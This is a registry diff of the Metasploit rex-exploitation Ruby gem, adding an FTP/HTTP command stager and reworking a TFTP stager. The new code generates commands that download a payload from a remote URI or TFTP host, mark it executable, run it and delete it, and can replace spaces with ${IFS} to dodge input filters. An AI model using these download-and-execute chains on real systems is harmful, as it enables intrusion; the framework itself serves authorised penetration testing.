rex-exploitation 0.1.30 → 0.1.33
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- checksums.yaml +4 -4
- checksums.yaml.gz.sig +0 -0
- data/lib/rex/exploitation/cmdstager/ftp_http.rb +49 -0
- data/lib/rex/exploitation/cmdstager/tftp.rb +35 -23
- data/lib/rex/exploitation/cmdstager.rb +1 -0
- data/lib/rex/exploitation/version.rb +1 -1
- data.tar.gz.sig +0 -0
- metadata +3 -2
- metadata.gz.sig +0 -0
checksums.yaml
CHANGED
|
@@ -1,7 +1,7 @@
|
|
|
1
1
|
---
|
|
2
2
|
SHA256:
|
|
3
|
-
metadata.gz:
|
|
4
|
-
data.tar.gz:
|
|
3
|
+
metadata.gz: 4567513652f9feb000ed35325302b3ae1401ccd716dc2f239804d3b18d873d3c
|
|
4
|
+
data.tar.gz: '095d0d2685bf3fde588e4fd2d366df900a1e3950fe810c9d6adae2b9d1ca7b8d'
|
|
5
5
|
SHA512:
|
|
6
|
-
metadata.gz:
|
|
7
|
-
data.tar.gz:
|
|
6
|
+
metadata.gz: 897d556a93ddf347c0a42cc2c581b9daf3b52bdc76775a66c7bad6a26de96d49f2555c01d69becac1456528cdd6d645942db557096ea70c7ad142f51f5d01cef
|
|
7
|
+
data.tar.gz: 6400490f470c42b81d26d7d6e4ce0ef3bee7baf27a331d7408d813a3eb6fc8f0ee8529ead6b531f4c82b52bb814a409fb7495170a1ed98227310f1933b7d8826
|
checksums.yaml.gz.sig
CHANGED
|
Binary file
|
|
@@ -0,0 +1,49 @@
|
|
|
1
|
+
# -*- coding: binary -*-
|
|
2
|
+
|
|
3
|
+
class Rex::Exploitation::CmdStagerFtpHttp < Rex::Exploitation::CmdStagerBase
|
|
4
|
+
|
|
5
|
+
def http?
|
|
6
|
+
true
|
|
7
|
+
end
|
|
8
|
+
|
|
9
|
+
def user_agent
|
|
10
|
+
/ftp/i
|
|
11
|
+
end
|
|
12
|
+
|
|
13
|
+
def generate(opts = {})
|
|
14
|
+
if opts[:payload_uri].nil?
|
|
15
|
+
raise "#{self.class.name}##{__callee__} missing opts[:payload_uri]"
|
|
16
|
+
end
|
|
17
|
+
|
|
18
|
+
opts[:temp] ||= '/tmp'
|
|
19
|
+
opts[:file] ||= Rex::Text.rand_text_alpha(8)
|
|
20
|
+
@payload_path = "#{opts[:temp]}/#{opts[:file]}"
|
|
21
|
+
|
|
22
|
+
super
|
|
23
|
+
end
|
|
24
|
+
|
|
25
|
+
def generate_cmds_payload(opts)
|
|
26
|
+
# -o: output file name (argument must be before URL)
|
|
27
|
+
["ftp -o #{@payload_path} #{opts[:payload_uri]}"]
|
|
28
|
+
end
|
|
29
|
+
|
|
30
|
+
def generate_cmds_decoder(opts)
|
|
31
|
+
cmds = []
|
|
32
|
+
|
|
33
|
+
cmds << "chmod +x #{@payload_path}"
|
|
34
|
+
cmds << @payload_path
|
|
35
|
+
cmds << "rm -f #{@payload_path}" unless opts[:nodelete]
|
|
36
|
+
|
|
37
|
+
cmds
|
|
38
|
+
end
|
|
39
|
+
|
|
40
|
+
def compress_commands(cmds, opts)
|
|
41
|
+
cmds.each { |cmd| cmd.gsub!(/\s+/, '${IFS}') } if opts[:nospace]
|
|
42
|
+
super
|
|
43
|
+
end
|
|
44
|
+
|
|
45
|
+
def cmd_concat_operator
|
|
46
|
+
';'
|
|
47
|
+
end
|
|
48
|
+
|
|
49
|
+
end
|
|
@@ -13,7 +13,7 @@ module Exploitation
|
|
|
13
13
|
# be written to disk and executed.
|
|
14
14
|
#
|
|
15
15
|
# This particular version uses tftp.exe to download a binary from the specified
|
|
16
|
-
# server.
|
|
16
|
+
# server. The original file is preserved, not encoded at all, and so this version
|
|
17
17
|
# is significantly simpler than other methods.
|
|
18
18
|
#
|
|
19
19
|
# Requires: tftp.exe, outbound udp connectivity to a tftp server
|
|
@@ -24,14 +24,24 @@ module Exploitation
|
|
|
24
24
|
|
|
25
25
|
class CmdStagerTFTP < CmdStagerBase
|
|
26
26
|
|
|
27
|
-
def
|
|
28
|
-
|
|
29
|
-
|
|
27
|
+
def generate(opts = {})
|
|
28
|
+
if opts[:tftphost].nil?
|
|
29
|
+
raise "#{self.class.name}##{__callee__} missing opts[:tftphost]"
|
|
30
|
+
end
|
|
31
|
+
|
|
32
|
+
opts[:linemax] ||= @linemax
|
|
33
|
+
opts[:file] ||= "#{Rex::Text.rand_text_alpha(8)}.exe"
|
|
34
|
+
opts[:temp] ||= '%TEMP%'
|
|
35
|
+
|
|
36
|
+
@payload_exe = opts[:file]
|
|
37
|
+
@payload_path = opts[:temp] == '.' ? opts[:file] : "#{opts[:temp]}\\#{opts[:file]}"
|
|
38
|
+
|
|
39
|
+
generate_cmds(opts)
|
|
30
40
|
end
|
|
31
41
|
|
|
32
42
|
def setup(mod)
|
|
33
43
|
self.tftp = Rex::Proto::TFTP::Server.new
|
|
34
|
-
self.tftp.register_file(
|
|
44
|
+
self.tftp.register_file(@payload_exe, exe)
|
|
35
45
|
self.tftp.start
|
|
36
46
|
mod.add_socket(self.tftp) # Hating myself for doing it... but it's just a first demo
|
|
37
47
|
end
|
|
@@ -40,28 +50,30 @@ class CmdStagerTFTP < CmdStagerBase
|
|
|
40
50
|
self.tftp.stop
|
|
41
51
|
end
|
|
42
52
|
|
|
43
|
-
|
|
44
|
-
|
|
45
|
-
|
|
46
|
-
|
|
47
|
-
|
|
48
|
-
|
|
49
|
-
|
|
50
|
-
|
|
51
|
-
# Make it all happen
|
|
52
|
-
cmds << "start #{@tempdir + @payload_exe}"
|
|
53
|
-
|
|
54
|
-
# Clean up after unless requested not to..
|
|
55
|
-
if (not opts[:nodelete])
|
|
56
|
-
# XXX: We won't be able to delete the payload while it is running..
|
|
53
|
+
def generate_cmds_payload(opts)
|
|
54
|
+
cmds = []
|
|
55
|
+
# We can skip the destination argument if we're writing to the working directory,
|
|
56
|
+
# as tftp defaults to writing the file to the current directory with the same filename.
|
|
57
|
+
if opts[:file] == @payload_path
|
|
58
|
+
cmds << "tftp -i #{opts[:tftphost]} GET #{opts[:file]}"
|
|
59
|
+
else
|
|
60
|
+
cmds << "tftp -i #{opts[:tftphost]} GET #{opts[:file]} \"#{@payload_path}\""
|
|
57
61
|
end
|
|
62
|
+
cmds
|
|
63
|
+
end
|
|
64
|
+
|
|
65
|
+
def generate_cmds_decoder(opts)
|
|
66
|
+
cmds = []
|
|
67
|
+
cmds << "start \"#{@payload_path}\""
|
|
68
|
+
# NOTE: We can't delete the payload while it is running.
|
|
69
|
+
cmds << "del \"#{@payload_path}\"" unless opts[:nodelete]
|
|
70
|
+
cmds
|
|
71
|
+
end
|
|
58
72
|
|
|
59
|
-
|
|
73
|
+
def cmd_concat_operator
|
|
74
|
+
' & '
|
|
60
75
|
end
|
|
61
76
|
|
|
62
|
-
# NOTE: We don't use a concatenation operator here since we only have a couple commands.
|
|
63
|
-
# There really isn't any need to combine them. Also, the ms01_026 exploit depends on
|
|
64
|
-
# the start command being issued separately so that it can ignore it :)
|
|
65
77
|
attr_reader :exe
|
|
66
78
|
attr_reader :payload_exe
|
|
67
79
|
attr_accessor :tftp
|
data.tar.gz.sig
CHANGED
|
Binary file
|
metadata
CHANGED
|
@@ -1,7 +1,7 @@
|
|
|
1
1
|
--- !ruby/object:Gem::Specification
|
|
2
2
|
name: rex-exploitation
|
|
3
3
|
version: !ruby/object:Gem::Version
|
|
4
|
-
version: 0.1.
|
|
4
|
+
version: 0.1.33
|
|
5
5
|
platform: ruby
|
|
6
6
|
authors:
|
|
7
7
|
- Metasploit Hackers
|
|
@@ -93,7 +93,7 @@ cert_chain:
|
|
|
93
93
|
EknWpNgVhohbot1lfVAMmIhdtOVaRVcQQixWPwprDj/ydB8ryDMDosIMcw+fkoXU
|
|
94
94
|
9GJsSaSRRYQ9UUkVL27b64okU8D48m8=
|
|
95
95
|
-----END CERTIFICATE-----
|
|
96
|
-
date: 2022-
|
|
96
|
+
date: 2022-07-14 00:00:00.000000000 Z
|
|
97
97
|
dependencies:
|
|
98
98
|
- !ruby/object:Gem::Dependency
|
|
99
99
|
name: rake
|
|
@@ -263,6 +263,7 @@ files:
|
|
|
263
263
|
- lib/rex/exploitation/cmdstager/debug_write.rb
|
|
264
264
|
- lib/rex/exploitation/cmdstager/echo.rb
|
|
265
265
|
- lib/rex/exploitation/cmdstager/fetch.rb
|
|
266
|
+
- lib/rex/exploitation/cmdstager/ftp_http.rb
|
|
266
267
|
- lib/rex/exploitation/cmdstager/lwprequest.rb
|
|
267
268
|
- lib/rex/exploitation/cmdstager/printf.rb
|
|
268
269
|
- lib/rex/exploitation/cmdstager/psh_invokewebrequest.rb
|
metadata.gz.sig
CHANGED
|
Binary file
|